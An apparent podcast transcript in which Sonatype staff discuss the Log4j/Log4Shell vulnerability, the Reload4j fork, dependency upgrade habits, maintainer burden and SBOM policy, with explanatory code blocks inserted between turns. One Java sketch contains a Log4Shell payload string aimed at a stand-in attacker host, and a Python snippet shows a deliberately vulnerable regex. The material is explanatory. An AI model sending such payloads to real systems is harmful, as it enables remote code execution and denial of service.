Wicked Good Development is dedicated to the future of open source. This space is to learn about the latest in the developer community and talk shop with OSS innovators and experts in the industry.
Our inaugural episode brings together three industry experts with different views on the world of software to talk about what we've learned from Log4j to today, what the fallout continues to be for teams tackling remediation, and how this one open source vulnerability has changed the world's view on open source and software supply chains. We also discuss general update behaviors in the development community and the risks associated with using old code. And, the silent industrial revolution, especially the question of who bears the burden of maintaining open source software.
Wicked Good Development is available wherever you find your podcasts.
Log4j, vulnerability remediation, upstream software security, software security and government
Kadi
Hey everyone, my name is Kadi Grigg and welcome to our project podcast. This is a space to learn about the latest in the developer community and talk shop with OSS experts in the industry.
Omar
Hola, my name is Omar and I'll be your co host. We're dedicated to the future of open source and want to bring you the latest in open source.
Kadi
In this episode, we have Brian Fox, CTO of Sonatype; Adam Cazzolla, Senior Researcher; and Ilkka Turunen, Field CTO. We are here to talk about Log4j, but before we jump into that, can you tell us all a little bit about who you are and what lens you're bringing to today's conversation?
Brian
Yeah, I'll go first. I'm Brian Fox, Co-founder and CTO here. I have a long background in software development going all the way back to C and C++, but I spent the majority of my career doing Java-related things. I'm most well known for my work on Apache Maven and a lot of the popular plugins there. And at Sonatype, we've always been the maintainers and stewards of the Maven Central Repository, where the world gets their open source Java, and so we know a thing or two because we've seen a thing or two.
Ilkka
I'll just go next. Yeah. Hey, thanks for having me. I'm Ilkka, the Field CTO here at Sonatype. I've got a history in DevOps and cloud adoption. I've spent the last decade working with companies implementing CI/CD and DevOps-type transformations, and over the last almost seven years now, working with them to manage their supply chains. So I take the perspective of: how do you actually take the theory and put it into practice? How do you put that into production? And over the years, we've run into many humps trying to get people to solve this problem.
Kadi
Great. Great to have you on. Adam.
Adam
I'm here more for a security perspective. Most of my career has basically been in security, doing vulnerability assessments, both static and dynamic, although prior to Sonatype I hadn't been exposed to the open source world as much. But yeah, I have been at Sonatype for six years now.
Kadi
It's great to have all of you on today. So first off, let's just get into it, right? We've all heard about Log4j by now; it happened in December, and since it's been identified, you know, a lot has actually happened. So for those of us that don't know what Log4j is, can you provide the highlights as to what Log4j was? And then, to be honest, what's really been discovered since patches have been deployed for this vulnerability?
Brian
Who wants to take this one?
Ilkka
Yeah, I'll just go ahead and take this one at a high level. So Log4j, you know, you could say it's probably one of the biggest things that happened in the software engineering industry, at least in the last decade or so; it's probably one of the biggest security breaches. It's a series of security vulnerabilities at this point. Originally, the very first one was called Log4Shell, which affects an extremely popular component called Log4j, which is why we just shorthand it to Log4j. Log4j literally does what it says on the tin: it logs what an application does. Just like a ship has a captain's log, where the captain writes down the events of what goes on in the ship, you know, "today we threw the first officer overboard," that sort of stuff. Similarly, that's exactly what Log4j does for software. So it's extremely popular; almost every piece of software that's distributed out there has Log4j, or something very similar to it, to do that function. It's a fairly standard thing to do. And this security vulnerability that was discovered, called Log4Shell, therefore had a massive attack surface. In fact, Log4j is one of the most popular components out there for the Java world; I think it's in the top 0.03 percentile of the most popular components. It's extremely popular everywhere. So when it came out, it was a big panic. Everybody rushed out to find where they were using it and patch it. I believe the first disclosure to the world was December 10. Since then, I believe there's been at least a dozen related CVEs, or security vulnerabilities, that have been discovered. So it's kind of been the gift that keeps on giving to the security industry. So yeah, that's Log4j in summary.
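The danger Ilkka describes came from Log4j 2's lookup substitution: the logger scanned log messages for `${...}` tokens and resolved them at log time, so logging an untrusted string like `${jndi:ldap://...}` could trigger a remote JNDI lookup (CVE-2021-44228). The self-contained sketch below only *detects* such tokens to illustrate the mechanism; it does not use Log4j itself, and the class and method names are hypothetical.

```java
import java.util.regex.Matcher;
import java.util.regex.Pattern;

// Illustrative sketch of why logging untrusted input was the attack surface:
// Log4j 2 treated ${scheme:value} tokens inside messages as lookups to resolve.
public class LookupSketch {
    private static final Pattern LOOKUP = Pattern.compile("\\$\\{(\\w+):([^}]*)\\}");

    // Returns the lookup scheme (e.g. "jndi") if the message contains a lookup
    // token, or null if the message is plain text.
    static String findLookupScheme(String logMessage) {
        Matcher m = LOOKUP.matcher(logMessage);
        return m.find() ? m.group(1) : null;
    }

    public static void main(String[] args) {
        // Untrusted input that an application might innocently log:
        String header = "User-Agent: ${jndi:ldap://attacker.example/a}";
        System.out.println(findLookupScheme(header));                  // jndi
        System.out.println(findLookupScheme("request from 10.0.0.1")); // null
    }
}
```

In the real vulnerability, resolving the `jndi` scheme caused the JVM to fetch and potentially execute attacker-controlled code, which is why the fix disabled message lookups by default.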
Kadi
So I mean, it seems like once Log4j happened, everybody was scurrying, right? Like a huge panic, because this is so widely used in almost every enterprise out there. Right. And we've since discovered some new findings, these new issues. So what we've kind of seen, from what I've heard from the development community, is that people are stuck in a catch-22 right now with how to upgrade. So, you know, what are the options right now for people who were on a vulnerable Log4j and are looking to upgrade?
Brian
Well, there's a couple of different Log4js; they almost should be thought of as two separate projects, if you want to think of it that way. There's Log4j 1, and there's Log4j 2. The vulnerability that kind of set the world on fire in December was largely a Log4j 2 issue. And even then, it's debatable if it was Log4j or the JNDI components underneath it, because the part that was actually executing the code, and that everybody was exploiting, was actually coming from the Java runtime pieces; that's effectively a dependency of Log4j. Log4j version 1 has been officially end of life for, what, five years now? Six, seven years? It's been a while. And so people that are on version 1 may not have been affected by this same vulnerability. But what's happened more recently is there have been some efforts to revive and fork version 1 of Log4j. And so the Apache project released several CVEs last week, trying to make everybody aware of vulnerabilities that exist in Log4j v1, because there was a lot of conversation around, "well, we'll just stay on v1, we're safe." It's like, actually, there are some issues that are known. They weren't filed previously, because the project was officially end of life. So that's why you see a handful of new disclosures coming out right now: to make the general public aware that version 1, and forks of version 1, may have some other issues. So staying on version 1 isn't exactly the perfect safe place to be either. So there have been a lot of conversations in the community about what to do with that. There is Reload4j, which is a fork of version 1 trying to fix some of these things, which ultimately prompted the release of these new CVEs. The Apache project is also thinking about some API compatibility layers that might make it possible to move to the Log4j v2 runtime and still continue to use the same API.
So it's not certain that that's going to happen, but there is a conversation about that, because the popularity is so high. And the challenge in moving to another project like Reload4j is that the names and the coordinates of the project have changed. So if you're using Maven, for example, Maven doesn't understand that Reload4j is a replacement for Log4j. So any place where the dependencies refer to Log4j, you might end up with both of them in your package. So users would have to go and do a bunch of exclusions, as we call them, to tell Maven not to include that on the classpath. There may be issues with the namespace of the packages of the classes themselves, right? So merely moving to a fork sounds easy on paper, but in practice, not so easy, which is what I think is prompting the conversations about more API compatibility to do that upgrade. So with all these things, the devil's in the details, and I think the communities, respectively, are still trying to sort out what is the easiest path forward for the users.
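The exclusions Brian mentions look roughly like the pom.xml fragment below: you exclude the transitive Log4j 1.x that some library drags in, then declare the fork explicitly so only one implementation lands on the classpath. This is a sketch, not a recipe; the `com.example:some-lib` coordinates are hypothetical, and the Reload4j version shown is illustrative, so check the project's published coordinates before using it.

```xml
<!-- Exclude the transitive log4j 1.x pulled in by a (hypothetical) library ... -->
<dependency>
  <groupId>com.example</groupId>
  <artifactId>some-lib</artifactId>
  <version>1.0</version>
  <exclusions>
    <exclusion>
      <groupId>log4j</groupId>
      <artifactId>log4j</artifactId>
    </exclusion>
  </exclusions>
</dependency>

<!-- ... then add the fork explicitly, so exactly one implementation is on the classpath. -->
<dependency>
  <groupId>ch.qos.reload4j</groupId>
  <artifactId>reload4j</artifactId>
  <version>1.2.19</version><!-- illustrative version -->
</dependency>
```

Note that this has to be repeated for every dependency that transitively pulls in Log4j 1.x, which is exactly why Brian calls it a mess to unwind at scale.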
Adam
And can I ask Brian a question on that? Since that would be a big effort for people to move over to Reload4j, is there any kind of commitment from the maintainer of Reload4j that they're going to support it for any period of time?
Brian
Yeah, I believe Ceki (I hope I get his name right; people can tell me if I'm mispronouncing it) was involved in the original Log4j project, and is also the maintainer of Logback, which is another logging framework. And so yes, he's made the statement that this is intended to be not just a temporary sort of patching situation, but more of an ongoing project. But the fact remains, so much of the world's dependencies are using Log4j underneath the hood that swapping that out will be a perpetual problem for people. And so that's part of the challenge. It's easy in theory to create new releases, but when the coordinates underneath change, and all the tooling doesn't recognize one thing as an in-place replacement for the other, that creates a real mess for people to unwind.
Kadi
I think it's interesting, Brian, that you brought up that this particular piece of code actually hasn't been updated in like five years; it's been sunsetted. So is this something we typically see within the development community, where people are actually running software that's unsupported or no longer supported by Apache or anyone else?
Brian
Unfortunately, yes. I think a big part of many of these things that we see when there are security disclosures is that it's harder for people to upgrade because they haven't been upgrading forever, right? And so you see people on very old versions of software. I mean, it doesn't just happen in open source; there are people still out there running critical systems on Windows 95, and all the versions of Windows between then and whatever the latest supported one is. This happens, right? And everybody says, "oh, it works just fine, leave it alone," until something like this happens. And then you're not just tasked with updating one dependency, you might be tasked with updating a whole bunch of them. There are similar problems with finding yourself on outdated versions of Java itself. Moving to a newer version of a dependency might actually require you to move to a newer version of the runtime, which then may need other dependencies to change. So you end up with what we used to call, back in the Windows days, DLL hell; you end up with that kind of problem. And it's because of all these interrelationships, primarily because you've let your system get so out of date that you now have a giant pile of technical debt. And this is one of these problems we've been trying to help people with for a decade and a half: to do a better job of staying up to date on these things.
Ilkka
Yeah, Brian, I mean, you're absolutely right. The philosophy usually in the back of people's minds is "if it ain't broke, don't fix it." But the problem is, you let it sit there, you let it decay, while everything else progresses onwards. There are these sort of tactical decisions that people make about updating their dependencies, and then something big like this comes into play, which folks in the industry like to call "security by press release," essentially, causing this sort of massive panic. And the reason why it's such a big fire drill is exactly that: you're running on XP, you're running an old Java, you're running code from 20 years ago with stuff that you haven't touched in ages, so you have to relearn it yourself again. And then there's the cascade effect of everything that Brian just described: things depend on other things that depend on other things, they're now updated, and you've got to fix them so that the new stuff works as well. And before you know it, what was a simple drop-in operation, maybe a matter of a couple of minutes of upgrading, ends up being, you know, two weeks of project work.
Kadi
Adam, what are your thoughts from a security perspective on this?
Adam
As far as upgrading? Yeah, I agree. I think we should probably pay a little more attention to upgrading. I know Brian used the phrase "software ages like cheese, not wine." And I think that
Brian
Milk. Cheese is okay.
Ilkka
Yeah, I love a stinky cheese.
Brian
It turns into stinky cheese if you wait long enough. But that's not what you wanted.
Adam
Yeah, so "ages like milk, not wine." But yeah, exactly. And that's the point: I think we do need to pay attention to it. We can't just assume, "hey, if it ain't broke, don't fix it." We can't make that assumption. There are vulnerabilities there that we're not aware of, and people are going to find them if we let it sit too long. So we do need to upgrade.
Kadi
I feel like it's often noisy, though, too, for developers to figure out where to start on some of that stuff, just because there's so many different things going on, and it's kind of a difficult decision to assess their exposure level. So, I mean, when you start those types of things, looking to figure out your exposure, and really a plan to remediate, where would you even start to try and sift through all that noise?
Brian
It is a challenge. It's why we've taken care in our systems to allow companies to prioritize what's most important, because at the end of the day, developers have to answer to all the parts of the business, right? It's not easy, but it's easier if you imagine you are the legal team, and you set out your rules around what licenses are allowed or not allowed based on whether the software is distributed or not. Okay, that seems pretty straightforward. And then you add in architecture constraints around what types of frameworks may or may not be used and what's compatible with them, the Java versions, things like that. That seems simple. And then the security team is sort of pushing on, "well, use projects or use versions that don't have vulnerabilities in them." Okay. Now, at the end of the day, as a developer you have to solve a multi-variable equation, because you have to satisfy all of those things. It does no good to swap out a component that has a vulnerability for one that gets your company sued for copyright infringement. That's not really the business outcome that everybody wants. And so it's hard. We recognized that early on, through the training and consulting that we did at the beginning of the company, back in 2008, 2009; this is what people were struggling with. So we've designed systems that will allow people to solve for it that way, recognizing the developer has to be able to look at all of these things; you can't walk around and ask five people for an opinion on a component, you don't have that kind of time. And so it's a challenge. I strongly believe it's also important to push that information to the teams working on the projects, because they're the ones who are best able to assess the impact of a particular component, in terms of how deeply do we use that component, how much of the capabilities are we using?
What is the actual risk of updating this component? Do we have a good testing framework in place? Is it going to change a bunch of my other dependencies? You know, I still see so many of what I would call legacy behaviors of security-by-list. Everybody says, "I just want the most important thing, and I'm going to tell everybody in my company to update this component." But that approach misses all those things I just mentioned. What happens if you mandate that a project update a particular component, and for whatever reason it wasn't really exploitable? Not all of these are super cut and dried. And now they've created six months' worth of additional tech debt work. Is that the right business outcome? Sometimes it is; many times it's not. But I feel like each application team should be able to make those types of decisions when they're well informed. That's the part that's missing today: they're not informed. They can't make these reasoned decisions. And so then the knee-jerk reaction is, "well, we'll just tell them what to do." But that doesn't help with the informing and making the reasoned decisions either.
Ilkka
Yeah, you know, the kind of anti-pattern that you see forming in places when that sort of thinking starts taking hold is two things. First of all, usually it's a very underfunded security team that mandates it. And part of the reason is, there's like one security person for, I don't know, 100 developers or something, right? So you can't really do much against that sort of onslaught of devs pushing code. And the kind of behavior that drives, that it teaches people to live in, is that security is an activity, right? It's a point check somewhere along the line; either it's early or it's late. And it kind of omits everything that Brian just said, right? It omits the fact that it isn't just a security task; it's actually a quality control task, it's a legal task, it's other things. And you know, the thing about security vulnerabilities is, everybody's always really surprised when they come out; they're really big, they're really bad, it's a big dumpster fire, got to react now. But these things come out all the time. If you drop like 0.1 points of severity, those sorts of vulnerabilities appear a lot more often, and they're almost as bad; they take a little bit of extra effort, but you really don't hear about them. And that's, I guess, the learning of the last few years for us in general: a lot of places just don't have a process for that, because they don't have the muscle. Then it becomes this sort of fire drill, right? And then, to avoid that fire drill in the future, someone says "never again," and says, "all right, before you release, here's the game of 50 questions that you have to answer." And I know from my own experience, you find your way around it, one way or the other, by hook or by crook. And usually if something goes bad, you just apologize for it later.
And that's how you get away with it.
Brian
Yeah, I mean, we've been doing a lot of analysis of upgrade behaviors. We surfaced some of this on the OSS Index website last year for individual components; we call it the herd migration. Because absent information about what the community of users is doing, generally people tend to land in one of two camps. Either they only update when they have a good reason to, which leads to this massive piling up of tech debt (that's the "if it ain't broke, don't fix it" approach, and we discussed why that's a problem), or the polar opposite, which is update every version, or update to n minus one. There's a lot of work involved in updating that often. I think Google, famously, with the monorepo across all their stuff, have one set of dependencies; they're able to pull it off, but not every company is able to do that. And updating to every version, like I said, involves a lot of work and can put you at risk. Most of the vulnerabilities that we've seen, the malicious attacks and things like that, especially in ecosystems like npm, are happening because there is a sort of default behavior within that community and within the tooling to update to the latest all the time, and only not do that if I've told you not to, right? Which is kind of the opposite of Maven; Maven will keep using the same version until you tell it to update. And so grabbing the bleeding edge is what the attackers expect the ecosystem to do. So it makes it a sweet spot: if I can just get something into the repository, I instantly have millions of people downloading it before anybody knows that I put something nefarious in there. And so how do you solve for that? N minus one, n minus two, a week, two weeks, six weeks, a month? Organizations have struggled for a long time trying to figure out how long is long enough to hold back.
And so what we've been able to do is look at the upgrade patterns and the usage, and you can find clear delineations in the ecosystem. We're trying to use that to provide more intelligence, again, to the developers. We can say: okay, you're in the herd. It's never safe to be the one out front, and it's also not safe to be the one at the back that might be attacked by the wolves. But if you're somewhere in the middle, you're probably safe. And where's the herd? We can show you that now with some of the data, which will allow you to be a little bit more intelligent about when to do an update. So you don't have to grab every single version if they're just point releases fixing stuff that maybe doesn't apply to you or that you don't need. But when you start to get towards that tail end, you can get a warning that, hey, now's the time, you might want to make a jump so that you stay in the middle of the herd and don't get left behind. Those charts are very interesting, though; maybe in the podcast notes we can put a link to one of these examples so people can see it, because when you look at it, it's very easy to see visually. It's a little bit harder to program recommendations around that, but it still shows, I think, the power of this concept.
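The "middle of the herd" idea Brian describes can be sketched as a toy calculation: given download counts per release, pick the version where cumulative adoption crosses the median, so you are neither on the bleeding edge nor in the straggling tail. This is a hypothetical illustration of the concept, not Sonatype's actual algorithm; the class name, method, and numbers are all made up.

```java
import java.util.LinkedHashMap;
import java.util.Map;

// Toy sketch of "find the herd": walk releases newest-first and return the
// version where cumulative downloads first reach half of the total.
public class HerdPicker {
    static String pickHerdVersion(LinkedHashMap<String, Long> downloadsNewestFirst) {
        long total = downloadsNewestFirst.values().stream().mapToLong(Long::longValue).sum();
        long running = 0;
        for (Map.Entry<String, Long> e : downloadsNewestFirst.entrySet()) {
            running += e.getValue();
            if (running * 2 >= total) {   // crossed the median of adoption
                return e.getKey();
            }
        }
        return null; // no releases
    }

    public static void main(String[] args) {
        LinkedHashMap<String, Long> downloads = new LinkedHashMap<>();
        downloads.put("2.17.2", 1_000L);   // bleeding edge: few adopters yet
        downloads.put("2.17.1", 40_000L);  // the herd is here
        downloads.put("2.16.0", 30_000L);
        downloads.put("2.14.1", 9_000L);   // stragglers at the back
        System.out.println(pickHerdVersion(downloads)); // 2.17.1
    }
}
```

A real recommendation would weigh more signals (release age, CVEs, upgrade velocity), but even this crude median captures why "somewhere in the middle" is a defensible default.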
Omar
On that note, is there any way to inject security into the ecosystem as a whole? And do developers even want that?
Ilkka
You know, we kind of did.
Brian
Yeah, we did. I'm not sure where you were going to go with that, Ilkka; why don't you go?
Ilkka
Yeah, you know, I was going to mention the fact that, well, there's kind of several ways of taking that question. The way I took it is: can we make open source more secure at the source, right? Before you even download it in the first place. And there are several solutions to that. One of the things that we do here is we run Maven Central, which is something that we've been stewards of since its inception. By default, when people download dependencies for Java, or Java-based languages like Android or Scala, or using tools like Gradle, usually they download them from Central. And one of the things that we implemented, actually before this Log4j thing, though it drove some new emphasis on it, is what we call the Central Security Project. Essentially, for every contributor that publishes dependencies into Central, as part of the publication process we actually do a security scan, and we provide them with security tools that they can use. And it has honestly had pretty decent uptake. I think it kind of drives that sort of awareness upstream, and it kind of helps them do that. So I think that's where I was going with it, Brian: just to mention that it is one domino in a long chain of things that need to happen. But, you know, not everybody's picking up on it, because it's voluntary.
Kadi
I mean, Adam, you're a senior security researcher, right? Your team looks to hunt for this type of stuff. I'm sure you've had some thoughts on how we could do that, or what people should be doing as best practices. What is your take on this?
Adam
I want to come in first on "do developers want this?" As a quick answer, a lot of it we do have; there's tooling already available, right, to find vulnerabilities, whether it's in your components or in the actual code that your developers are writing. Could we inject it earlier? Yes. Do developers want it? I did want to touch on that, because I don't think that's an easy answer. Short answer: yes, developers want it, but only if it is agreeable to them. If there's some kind of tooling or something that they have to fight with, they're not going to want it, right? So I think they want it, as long as it plays nicely with their workflow, right? It's not going to impede their development, and maybe it gets the security team off their back. If you can put it in their hands in a nice way that gets the security team off their back, that's what they want.
Brian
Yeah, I mean, I think this starts to dovetail into the White House meeting conversation that I know we had notes we were going to chat about. So there was a meeting a couple of weeks back where they convened a lot of the leaders from big companies and some open source organizations; Apache and Red Hat, I think, were in attendance. And this Log4j sort of crisis has kind of reignited the conversation, one that's been out there for a while, around open source and bills of materials and things like that. Part of the knee-jerk reaction is always that people feign, or actually are, shocked about how much open source is in commercial software. I mean, we've been staring at these statistics for well over a decade: about 90% of a modern application is composed of open source code your developers didn't write. That's why they can get stuff done so fast. There is an element of building on the people that came before you, and that is a good thing, generally. But at times like this, there are these perceptions that all open source is written by amateurs, and that they don't know what they're doing, and they don't care. That's just categorically not true. Most of these popular open source projects that everybody uses are contributed to by employees of these large companies. Some of them were internal projects before they were open sourced and forked to the world. Google and Facebook and Microsoft and Red Hat have been doing that for years. And so it's the same people working on open source projects that are writing that commercial code. These are not, for the most part, just people who are dabbling.
I mean, certainly, there are elements of that; you will find small components like that, and that's part of paying attention to the hygiene and making better choices about what projects you use. But the ones that people usually talk about as critical infrastructure, things like OpenSSL and Spring and a lot of these Apache projects, are in fact written by professionals. So the knee-jerk reaction is, "well, we need to help teach them to do a better job." That's not usually the case. Usually these bugs are found, the responsible disclosure happens, they're fixed, and they're turned around very quickly. The problem we've seen is that the users don't update. So you can make the software better in theory, you can make the turnaround faster in theory, but if nobody ever updates, and they're running stuff that's 10 years old, how does any of that help the problem? And that's the frustrating part for me: there's always that conversation of, "well, we should just throw more money at it; let's create a marketplace to pay people to work on it." That sounds like a recipe for disaster. If you think that it's bad because you've got amateurs working on stuff now, which is, again, not correct, but if you assume that that's the case, at least they know the project. What happens when you pay a bunch of people who are only motivated to get the money, to start throwing patches at projects that they're not familiar with? That's kind of like the definition of insanity; that's probably going to make stuff worse, right? And it assumes that it takes money to motivate these maintainers to fix things, which is just also not true. So the money and the focus really need to be on helping, or incenting, or requiring, as in the case of the executive order, companies to start paying attention to their dependencies and disclosing them.
I think that's the way this ultimately gets solved.
Adam
I'd like to add to that. So when we do research and look at GitHub projects where people are opening up new issues against them reporting vulnerabilities, oftentimes, you know, the maintainers can't get to them immediately, right? Like Brian said, they are professional developers, but this project is not their full-time job. They have a full-time job; this is something they're doing in their free time, just because it's interesting to them, or it's useful to them and they want to share it with others. So they don't have the time to jump on every little fix. So you see the project maintainer pushing back: "hey, if this is so urgent to you, why don't you submit a fix?" This kind of goes back to what Brian said, too. I've seen people bring up that same "throw money at it" idea, and I think GitHub even now has a donation link you can set up on your GitHub project, which is good. But again, for that developer it's not his full-time job; you can throw more money at him, but it's a time issue. He just doesn't have the time to do all the work. So throwing money at it doesn't solve that. But what I think maybe could, and I'd love to hear anyone's thoughts on it, is to encourage the developers that are asking for it, and maybe get your company's buy-in on this. If your developer is stuck, and you can't move your own code forward in your professional work because you're relying on this vulnerable component: pay your developer, just have them fix it and submit a pull request. It seems like it's worth it. Yes, you're paying your developer to write code for another project, but it's a project you're using and getting value out of for free.
I mean, so yeah, it's worth it in the end. That way you get it fixed faster, you can get the new build out faster; it seems, in the end, more cost effective for you anyway to just pay your developer to submit the PR to the affected projects. And I think we should encourage that more: not just throw money at it, donate your time instead. That, I think, is what we should encourage.
Ilkka
Yeah, no, I mean, you're absolutely, like, 100% agreed, Adam; that's exactly the issue. I think when you look at it from just the end user and adoption perspective, there's a fundamental misunderstanding about open source. Every single license file of every single piece of open source that you download and adopt actually has a very big, block-capital kind of statement that says this software is provided "as is," without warranty. And what that really means is that it is what it is: you adopt it at your own risk, and you also accept and understand that that's the decision you make. Because of how we've built our systems, like "move fast, break things," just try stuff out, because of the ease of adopting open source, which is by and large a very, very good thing. We wouldn't have an Amazon, we wouldn't have Google, we wouldn't have Spotify, we wouldn't have any of these big companies if it wasn't for this sort of, what I always call, silent industrial revolution in software programming. We moved away from typing BASIC, and we started moving into just filling in the blanks: let other people smarter than you figure out the hard stuff, and you fill in the blanks, the part which is special to you. And that's why we're in this sort of situation where 90% of software, generally, is third party to your organization. The problem is, most people just don't realize that that's the case. They don't even think about those external things as external things; they just think that they're part and parcel of whatever they're using.
So when you run into a problem, those pressures and misunderstandings of that very basic fact, that this is code you're using without any warranty, without any guarantee, lead to added pressure. There is very real pressure on projects from their end users. If you look at any popular open source project and you look at the issues, there are a lot of folks asking for a lot of things. They're chasing updates, because the project is probably very, very important to them. And that omits the fact that there are probably not that many people behind the project. Log4j, for example, has three maintainers and is used by millions; it's one of the most popular open source projects out there. Throwing money at the problem is probably actually going to make it worse, because the maintainers are going to go, you know what, it's time for early retirement, if anything, right? And it doesn't fundamentally solve anything. The entire philosophy of open source was that, hey, if you see a problem, you don't need to ask permission: just go and fix it, and propose that fix back to the project. Somewhere along the line we've kind of lost that. I think it's a function of mass adoption; fewer people have that idealistic sense of what open source is supposed to be. And it leads to a tough place to be as a maintainer, because on the one hand you do care about those problems, you do want to solve them. On the other hand, you can't clone yourself, there are only 24 hours in a day, and you also have to do your day job.
Adam
I do want to add on to one point you made, Ilkka, about that inherent risk in open source. Some people say, and there's truth to it, that open source software, because the source code is readily available, has people looking at it, and so it tends not to be so risky. People are looking at it and submitting patches, and that does happen. But I think we need to be careful; I don't think we want to trust it too much. Yes, people are looking at it, but not at everything. Professional security researchers are probably looking at whatever company hired them, or there are bug bounty programs and they're going after those. This is a profession, right? They need some kind of financial reimbursement for what they're doing, so they're not looking at all these free projects; some smaller projects just aren't getting looked at. Maybe they get looked at in a more academic sense; in academia you have researchers, some university students, so you might get coverage there. But usually, from what I've seen, in that case they're researching one very specific thing, a very specific type of vulnerability, and they may scan every GitHub project looking for that one thing. Again, that's not very exhaustive; they're not checking for everything. So while the source is readily available and people are looking at it, I don't think we should assume that the entire code base of every single GitHub project or open source project is being looked at. We don't want to take it that far. There are definitely still inherent risks in using open source, and we just need to be aware of that.
Ilkka
No, no, you know, the other interesting thing about it is that I always have an assumption, when I adopt something, that they probably know better than I do. Hey, it's an open source project, it's got a readme, it's got a website, it's got PRs from people I've read about in books and heard about at conferences, so you naturally assume they know what they're doing and that they're doing a good thing. And then when there's a vulnerability situation, your natural assumption is that they'll figure it out in a jiffy, and that will be it, right? And that's just not how people in general work. You can be a maintainer, you can be a superstar, and still be completely blind to a problem, or very slow at figuring it out if it's a new kind of problem. Which is another reason why I feel people set a really high bar for contributing to open source for no reason. It feels like, hey, these people surely must know what they're doing, and from a security perspective you feel like, surely they've checked it out, surely it's good. The reality is, maybe it's not. Maybe they're just really good Java programmers who have no idea about security whatsoever. And you might actually be a better person to give them that assessment than they are themselves.
Adam
I actually have an example I can share real quick, if you want a real world one. There was a project where I found a regular expression denial of service vulnerability, and it was a very long, complex expression. When I reported it to the affected project, which was a very popular project, they definitely needed some help fixing it; they did not know regular expressions that well. And when I looked into when it got introduced into their code base, because again, regular expressions are hard, right, it turned out they had just pulled that expression from a StackOverflow article. That's where they got it from. So yes, they needed help. You can't expect that project maintainers are experts in everything; nobody is. So yeah, they could definitely use some outside help as well.
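Adam's regular expression denial of service (ReDoS) story can be made concrete with a minimal sketch. The pattern and timings below are purely illustrative, not the actual expression from his report: nested quantifiers like `(a+)+` force a backtracking engine to try exponentially many ways of splitting the input once the overall match fails.

```python
import re
import time

# Illustrative vulnerable pattern (NOT the one from the real report):
# the nested quantifier (a+)+ creates catastrophic backtracking.
vulnerable = re.compile(r"^(a+)+$")
safe = re.compile(r"^a+$")  # matches the same strings, no nesting

def time_match(pattern, text):
    """Return how long pattern.match(text) takes, in seconds."""
    start = time.perf_counter()
    pattern.match(text)
    return time.perf_counter() - start

# A "near-miss" input: all 'a's except a trailing '!' that breaks the
# match, so the engine backtracks through every way to group the 'a's.
text = "a" * 20 + "!"
slow = time_match(vulnerable, text)  # roughly 2^19 backtracking splits
fast = time_match(safe, text)        # fails in linear time
```

The usual fix is exactly what the safe variant shows: flatten the nested quantifier (or switch to a linear-time engine) so a failing input is rejected without the exponential blow-up.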
Omar
Okay, back to this government involvement. There's a sense of defiance in doing new things, and that's what I see from developers, right? They're always creating new things; they're real creative people. So is there any pushback against government involvement, given that the White House is taking this so seriously?
Brian
I don't think so. I think there are conversations being had, and the conversations are not harmful; raising the bar on the focus and on what is considered minimum due care, I think, is how this ultimately ends up playing out. There could be an overreaction, which could potentially kill an entire industry and all that, but that's probably unlikely. I just think some of the conversations, like I said before, get slanted toward trying to solve the wrong part of the problem, because it requires a deeper understanding of the nuances and the behaviors and the interplay between producers and consumers than people unfamiliar with the industry might expect. But at the moment, I think it's okay that the conversations are happening. It's the same thing with the bill of materials; those conversations have been going on for a while. Certainly the government started leading an effort, the NTIA effort for SBOMs, back in 2018 or 2019, certainly pre-pandemic; it all kind of blends together after that. And it's just now starting to get to the point where companies are really asking about it. Certainly things like Log4j and SolarWinds and the other things that have happened over the last year have driven that conversation ahead. But these things take time; they take time to get right.
Adam
And I'd be curious to hear from y'all; I hadn't had a chance to think about it until you just asked the question: what problems would we see with government involvement? The minute I think about it, if they're setting up regulations and things like that, forcing businesses to have some kind of minimum set of security controls, the only problem I can see is for smaller businesses that just don't have the funding to put those controls in place. I'm just a super small mom and pop business, right? Why do I need to set all this up? Maybe that would be the best argument against it. Where I could see a lot of people having a problem, though, and I don't think this is where the whole government thing is going anyway, is if they said: we're going to set up this group of experts, and all US companies have to submit their source code to us, and we're going to review all your code for you. You don't want government involved in that way, right? That's definitely bad. But if they're just setting a bare minimum, like a business needs to have this minimum set of controls, do we see problems with that? I don't know.
Ilkka
Yeah, I mean, the devil's in the details when it comes to this sort of work, right? Too little, and it can be as good as not doing anything at all, except you're now paying advisors to tell you what the little thing to do is, and you're getting no tangible value out of it. You could argue that PCI compliance, in some respects, is like that: the older versions of PCI DSS, where you're ticking a bunch of boxes because you have to tick a bunch of boxes, and practically you don't really gain any benefit, because mom and pop shops have to certify against PCI even when they're using entirely third party software to do it. I think the other aspect of this is that when you look at the White House work that's happening, it's good that there's a conversation about software bills of materials specifically; when you read through the executive order, they make mention of it. But there are competing standards, each with a different slant: there's a security-focused standard, there's a licensing-focused standard. So again, you land in the same place. It's good to define that you need a software bill of materials, but if the software bill of materials only conveys licensing information, or very rudimentary security information, is it really useful for the purpose you're putting it to? My personal take, and this brings us to the version of this we have here in the UK, which is cybersecurity regulation around supply chains in general, with a very casual mention of software supply chains, is that it's almost too generic.
It's giving organizations guilt about using third party software without giving them any understanding of what the risks actually are. It's not third party code that's the problem; it's your ability to understand exactly which third parties you have, and your ability to get rid of them when you need to. That's the real problem, right? And so striking that balance in legislation, I think that's where the danger really lies. On the one hand, you're causing people to take action without any real results; on the other hand, you're writing legislation that's already outdated by the time it actually comes out.
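To make Ilkka's point about "knowing exactly which third parties you have" concrete, here is a hedged sketch of what a minimal, security-slanted SBOM entry might look like, loosely modeled on the CycloneDX format (the component shown and its version are illustrative):

```json
{
  "bomFormat": "CycloneDX",
  "specVersion": "1.4",
  "components": [
    {
      "type": "library",
      "group": "org.apache.logging.log4j",
      "name": "log4j-core",
      "version": "2.14.1",
      "purl": "pkg:maven/org.apache.logging.log4j/log4j-core@2.14.1"
    }
  ]
}
```

A licensing-focused standard such as SPDX slants toward license fields instead, which is the competing-standards tension Ilkka describes: an SBOM that pins each dependency down to an exact version is what lets you find, and get rid of, an affected component when you need to.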
Kadi
Yeah, no, that's true. Unfortunately, we're running out of time today. Today's conversation has been wildly fascinating, and it's been a great discussion, with a real variety of lenses put on these issues. So I just wanted to ask for your final thoughts before we wrap. Brian?
Brian
Users and consumers of open source need to start paying attention to what's in their software. There are tools out there, and I think these attacks have shown that ignoring the problem doesn't make it go away, and that it's going to be inconvenient to respond if you haven't been paying attention all along. So I think I'll leave it with that. We covered a lot of ground today, and I think it will be interesting to see in subsequent episodes how this conversation adapts to whatever is new and hot at the time. Adam?
Adam
